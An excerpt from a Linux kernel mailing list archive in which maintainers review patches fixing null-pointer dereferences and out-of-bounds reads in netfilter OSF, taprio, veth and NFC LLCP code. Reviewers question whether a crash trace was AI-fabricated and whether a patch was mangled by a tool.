> Does not apply cleanly to net and looks seriously mangled. I suspect the
> above chunks should be part of the actual patch ?!?
>
> Please, whatever tool you are using to help crafting the patch, double
> check the result manually before the actual submission.
>
> /P
>
Hi,
Sorry about the broken v2. I'll double-check everything carefully and
resend as v3.
Thanks,
Weiming
^ permalink raw reply
* Re: [PATCH] netfilter: nfnetlink_osf: fix null-ptr-deref in nf_osf_ttl
From: Pablo Neira Ayuso @ 2026-04-14 8:22 UTC (permalink / raw)
To: Kito Xu (veritas501)
Cc: Florian Westphal, Phil Sutter, David S. Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, Simon Horman,
Fernando Fernandez Mancera, netfilter-devel, coreteam, netdev,
linux-kernel
In-Reply-To: <20260414074556.2512750-1-hxzene@gmail.com>
Hi,
On Tue, Apr 14, 2026 at 03:45:56PM +0800, Kito Xu (veritas501) wrote:
> nf_osf_ttl() calls __in_dev_get_rcu(skb->dev) and passes the result
> to in_dev_for_each_ifa_rcu() without checking for NULL. When the
> receiving device has no IPv4 configuration (ip_ptr is NULL),
> __in_dev_get_rcu() returns NULL and in_dev_for_each_ifa_rcu()
> dereferences it unconditionally, causing a kernel crash.
How could skb->dev be NULL !?
This is run from prerouting, input and forward.
> This can happen when a packet arrives on a device that has had its
> IPv4 configuration removed (e.g., MTU set below IPV4_MIN_MTU causing
> inetdev_destroy) or on a device that was never assigned an IPv4
> address, while an xt_osf or nft_osf rule with TTL_LESS mode is
> active and the packet TTL exceeds the fingerprint TTL.
>
> Add a NULL check for in_dev before the iteration. When in_dev is
> NULL, return 0 (no match) since source-address locality cannot be
> determined without IPv4 addresses on the device.
>
> KASAN: null-ptr-deref in range
> [0x0000000000000010-0x0000000000000017]
> RIP: 0010:nf_osf_match_one+0x204/0xa70
I cannot believe this, I think AI is mocking KASAN splat, if that is
the case, I am sorry to say, but it is too bad if you are doing this.
> Call Trace:
> <IRQ>
> nf_osf_match+0x2f8/0x780
> xt_osf_match_packet+0x11c/0x1f0
> ipt_do_table+0x7fe/0x12b0
> nf_hook_slow+0xac/0x1e0
> ip_rcv+0x123/0x370
> __netif_receive_skb_one_core+0x166/0x1b0
> process_backlog+0x197/0x590
> __napi_poll+0xa1/0x540
> net_rx_action+0x401/0xd80
> handle_softirqs+0x19f/0x610
> </IRQ>
>
> Fixes: a218dc82f0b5 ("netfilter: nft_osf: Add ttl option support")
> Signed-off-by: Kito Xu (veritas501) <hxzene@gmail.com>
> ---
> net/netfilter/nfnetlink_osf.c | 3 +++
> 1 file changed, 3 insertions(+)
>
> diff --git a/net/netfilter/nfnetlink_osf.c b/net/netfilter/nfnetlink_osf.c
> index d64ce21c7b55..85dbd47dbbd4 100644
> --- a/net/netfilter/nfnetlink_osf.c
> +++ b/net/netfilter/nfnetlink_osf.c
> @@ -43,6 +43,9 @@ static inline int nf_osf_ttl(const struct sk_buff *skb,
> else if (ip->ttl <= f_ttl)
> return 1;
>
> + if (!in_dev)
> + return 0;
> +
> in_dev_for_each_ifa_rcu(ifa, in_dev) {
> if (inet_ifa_match(ip->saddr, ifa)) {
> ret = (ip->ttl == f_ttl);
> --
> 2.43.0
>
^ permalink raw reply
* Re: [syzbot ci] Re: veth: add Byte Queue Limits (BQL) support
From: Aleksandr Nogikh @ 2026-04-14 8:17 UTC (permalink / raw)
To: syzbot+cib904ea9ebb647254, hawk; +Cc: netdev, linux-kernel, syzkaller-bugs
In-Reply-To: <69dd48c2.a00a0220.468cb.004e.GAE@google.com>
Hmm, just fixed a problem that may have affected `syz test` processing,
let's try again:
#syz test
---
drivers/net/veth.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/veth.c b/drivers/net/veth.c
index 911e7e36e166..9d7b085c9548 100644
--- a/drivers/net/veth.c
+++ b/drivers/net/veth.c
@@ -1138,7 +1138,9 @@ static void veth_napi_del_range(struct net_device
*dev, int start, int end)
*/
peer = rtnl_dereference(priv->peer);
if (peer) {
- for (i = start; i < end; i++)
+ int peer_end = min(end, (int)peer->real_num_tx_queues);
+
+ for (i = start; i < peer_end; i++)
netdev_tx_reset_queue(netdev_get_tx_queue(peer, i));
}
^ permalink raw reply related
* Re: [PATCH net v2] net/sched: taprio: fix NULL pointer dereference in class dump
From: Paolo Abeni @ 2026-04-14 8:16 UTC (permalink / raw)
To: Weiming Shi, Vinicius Costa Gomes, Jamal Hadi Salim, Jiri Pirko,
David S . Miller, Eric Dumazet, Jakub Kicinski
Cc: Simon Horman, Vladimir Oltean, netdev, linux-kernel, Xiang Mei
In-Reply-To: <20260410153902.955227-2-bestswngs@gmail.com>
On 4/10/26 5:39 PM, Weiming Shi wrote:
> When a TAPRIO child qdisc is deleted via RTM_DELQDISC, taprio_graft()
> is called with new == NULL and stores NULL into q->qdiscs[cl - 1].
> Subsequent RTM_GETTCLASS dump operations walk all classes via
> taprio_walk() and call taprio_dump_class(), which calls taprio_leaf()
> returning the NULL pointer, then dereferences it to read child->handle,
> causing a kernel NULL pointer dereference.
>
> The bug is reachable with namespace-scoped CAP_NET_ADMIN on any kernel
> with CONFIG_NET_SCH_TAPRIO enabled. On systems with unprivileged user
> namespaces enabled, an unprivileged local user can trigger a kernel
> panic by creating a taprio qdisc inside a new network namespace,
> grafting an explicit child qdisc, deleting it, and requesting a class
> dump. The RTM_GETTCLASS dump itself requires no capability.
>
> Oops: general protection fault, probably for non-canonical address 0xdffffc0000000007: 0000 [#1] SMP KASAN NOPTI
> KASAN: null-ptr-deref in range [0x0000000000000038-0x000000000000003f]
> RIP: 0010:taprio_dump_class (net/sched/sch_taprio.c:2475)
> Call Trace:
> <TASK>
> tc_fill_tclass (net/sched/sch_api.c:1966)
> qdisc_class_dump (net/sched/sch_api.c:2329)
> taprio_walk (net/sched/sch_taprio.c:2510)
> tc_dump_tclass_qdisc (net/sched/sch_api.c:2353)
> tc_dump_tclass_root (net/sched/sch_api.c:2370)
> tc_dump_tclass (net/sched/sch_api.c:2431)
> rtnl_dumpit (net/core/rtnetlink.c:6827)
> netlink_dump (net/netlink/af_netlink.c:2325)
> rtnetlink_rcv_msg (net/core/rtnetlink.c:6927)
> netlink_rcv_skb (net/netlink/af_netlink.c:2550)
> </TASK>
>
> Fix this by substituting &noop_qdisc when new is NULL in
> taprio_graft(), following the same pattern used by multiq_graft() and
> prio_graft(). This ensures q->qdiscs[] slots are never NULL, making
> control-plane dump paths safe without requiring individual NULL checks.
>
> Also update the data-plane NULL guards in taprio_enqueue() and
> taprio_dequeue_from_txq() to check for &noop_qdisc, so that packets
> are still dropped cleanly without inflating qlen/backlog counters.
>
> Fixes: 665338b2a7a0 ("net/sched: taprio: dump class stats for the actual q->qdiscs[]")
> Reported-by: Xiang Mei <xmei5@asu.edu>
> Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> ---
> v2:
> - Update NULL checks in taprio_enqueue() and taprio_dequeue_from_txq()
> to test for &noop_qdisc instead of NULL, preventing qlen/backlog
> counter inflation when noop_qdisc drops packets (Sashiko)
> ---
> net/sched/sch_taprio.c | 11 +++++++----
> 1 file changed, 7 insertions(+), 4 deletions(-)
>
> diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
> index f721c03514f60..XXXXXXXXX 100644
> --- a/net/sched/sch_taprio.c
> +++ b/net/sched/sch_taprio.c
> @@ -634,7 +634,7 @@ static int taprio_enqueue(struct sk_buff *skb, struct Qdisc *sch,
>
> child = q->qdiscs[queue];
> - if (unlikely(!child))
> + if (unlikely(child == &noop_qdisc))
> return qdisc_drop(skb, sch, to_free);
>
> if (taprio_skb_exceeds_queue_max_sdu(sch, skb)) {
> @@ -717,7 +717,7 @@ static struct sk_buff *taprio_dequeue_from_txq(struct Qdisc *sch, int txq,
> int prio;
> int len;
> u8 tc;
>
> - if (unlikely(!child))
> + if (unlikely(child == &noop_qdisc))
> return NULL;
>
> if (TXTIME_ASSIST_IS_ENABLED(q->flags))
> @@ -2183,6 +2183,9 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> if (!dev_queue)
> return -EINVAL;
>
> + if (!new)
> + new = &noop_qdisc;
> +
> if (dev->flags & IFF_UP)
> dev_deactivate(dev);
>
> @@ -2196,14 +2199,14 @@ static int taprio_graft(struct Qdisc *sch, unsigned long cl,
> *old = q->qdiscs[cl - 1];
> if (FULL_OFFLOAD_IS_ENABLED(q->flags)) {
> WARN_ON_ONCE(dev_graft_qdisc(dev_queue, new) != *old);
> - if (new)
> + if (new != &noop_qdisc)
> qdisc_refcount_inc(new);
> if (*old)
> qdisc_put(*old);
> }
>
> q->qdiscs[cl - 1] = new;
> - if (new)
> + if (new != &noop_qdisc)
> new->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
>
> if (dev->flags & IFF_UP)
> --
> 2.43.0
Does not apply cleanly to net and looks seriously mangled. I suspect the
above chunks should be part of the actual patch ?!?
Please, whatever tool you are using to help crafting the patch, double
check the result manually before the actual submission.
/P
^ permalink raw reply
* Re: [PATCH net 0/3] nfc: llcp: fix OOB reads in TLV parsers and PDU handlers
From: Paolo Abeni @ 2026-04-14 8:11 UTC (permalink / raw)
To: Lekë Hapçiu, netdev; +Cc: linux-nfc, stable, davem, edumazet, kuba
In-Reply-To: <20260409233517.1891497-1-snowwlake@icloud.com>
On 4/10/26 1:35 AM, Lekë Hapçiu wrote:
> This series fixes three out-of-bounds read vulnerabilities in the NFC
> LLCP layer, all reachable from RF without prior pairing or session
> establishment.
>
> Patch 1 adds missing TLV length bounds checks in nfc_llcp_parse_gb_tlv()
> and nfc_llcp_parse_connection_tlv() — a crafted CONNECT or SNL PDU
> containing a short TLV value field can read beyond the skb tail.
>
> Patch 2 fixes nfc_llcp_recv_snl(), which accessed TLV fields and
> performed arithmetic on an uncapped length byte before any bounds
> check, enabling a 1-byte heap OOB read and a u8 wrap-around.
>
> Patch 3 fixes nfc_llcp_recv_dm(), which read the DM reason byte at
> skb->data[2] without verifying the frame is at least 3 bytes long.
> A 2-byte DM PDU (header only) from a rogue peer triggers a 1-byte
> OOB heap read.
>
> All three bugs are independently triggered via RF (AV:A, AC:L, no
> authentication required).
This series looks like an older iteration of:
https://patchwork.kernel.org/user/todo/netdevbpf/?series=1079400
but it reached the ML 2h afterwards?!?
At very best you have some serious setup issue. Please have a look at
the repost policy and especially at the 24h grace period:
https://elixir.bootlin.com/linux/v7.0/source/Documentation/process/maintainer-netdev.rst
And, given the above problem, please do not share any more patches for
at least 48h.
/P
^ permalink raw reply
page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox